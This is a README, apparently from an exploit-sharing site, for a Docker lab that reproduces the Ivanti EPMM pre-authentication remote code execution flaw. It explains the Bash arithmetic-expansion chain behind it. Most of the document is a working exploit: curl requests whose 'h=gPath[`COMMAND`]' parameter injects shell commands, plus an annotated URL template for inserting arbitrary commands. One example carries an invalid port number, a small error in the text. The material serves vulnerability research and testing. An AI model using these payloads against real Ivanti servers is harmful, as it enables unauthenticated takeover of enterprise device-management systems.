Share
## https://sploitus.com/exploit?id=AC4871CE-CE60-5709-98A9-551F3A9DB7A2
# Ivanti EPMM pre-auth RCE Dummy Target

A simple demo application that shows how to reproduce the Ivanti EPMM pre-auth RCE vulnerability (CVE-2026-1281 / CVE-2026-1340) for educational and security research purposes.

## Vulnerability Overview

This vulnerability exploits Bash arithmetic expansion behavior. When a variable containing a reference to another variable is used in arithmetic context, and that referenced variable contains an array index with command substitution, the command is executed.

### The Exploit Chain

1. Request contains `st=theValue  ` (literal string "theValue" with padding)
2. Request contains `h=gPath[\`command\`]` (command in array index)
3. Bash script parses key=value pairs in a loop, updating `theValue` each iteration
4. `gStartTime` is set to the literal string `"theValue"`
5. After loop, `theValue` contains `gPath[\`command\`]`
6. When `[[ ${currentTime} -gt ${gStartTime} ]]` is evaluated:
   - `${gStartTime}` โ†’ `"theValue"` (string)
   - Arithmetic context treats `theValue` as variable reference
   - `theValue` โ†’ `gPath[\`command\`]`
   - Array index triggers command substitution โ†’ **RCE!**

## Quick Start

```bash
# Build and start the container
docker-compose up --build -d

# Check it's running
curl http://localhost:8180/health
```

## Testing the Vulnerability

### 1. File Creation Test

Create a file to prove command execution:

```bash
# URL-encoded payload: id > /mi/poc
curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20%3E%20/mi/poc%60%5D/test.ipa"

# Check if file was created
cat artifacts/poc
```

### 2. Time-Based Test

Verify with a sleep command:

```bash
# Should take ~5 seconds to respond
time curl "http://localhost:81080/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60sleep%205%60%5D/test.ipa"
```

### 3. Custom Command Execution

```bash
# Write custom content
curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60echo%20PWNED%20%3E%20/mi/pwned%60%5D/test.ipa"

cat artifacts/pwned
```

## URL Structure

```
/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60COMMAND%60%5D/uuid.ipa
                               โ”‚      โ”‚              โ”‚              โ”‚
                               โ”‚      โ”‚              โ”‚              โ””โ”€ Payload: gPath[`COMMAND`]
                               โ”‚      โ”‚              โ””โ”€ End timestamp (any 10 digits)
                               โ”‚      โ””โ”€ CRITICAL: literal "theValue" + 2 spaces (10 chars total)
                               โ””โ”€ Key index (any value)
```

## Debugging

```bash
# View container logs
docker-compose logs -f

# Get a shell in the container
docker exec -it ivanti-epmm-vuln /bin/bash

# Check nginx error logs
docker exec -it ivanti-epmm-vuln cat /var/log/nginx/error.log
```

## Cleanup

```bash
docker-compose down
rm -rf artifacts/*
```

## References

- [WatchTowr Labs Blog Post](https://labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/)

## Disclaimer

This is for **educational and authorized security testing purposes only**. Do not use against systems you do not own or have explicit permission to test.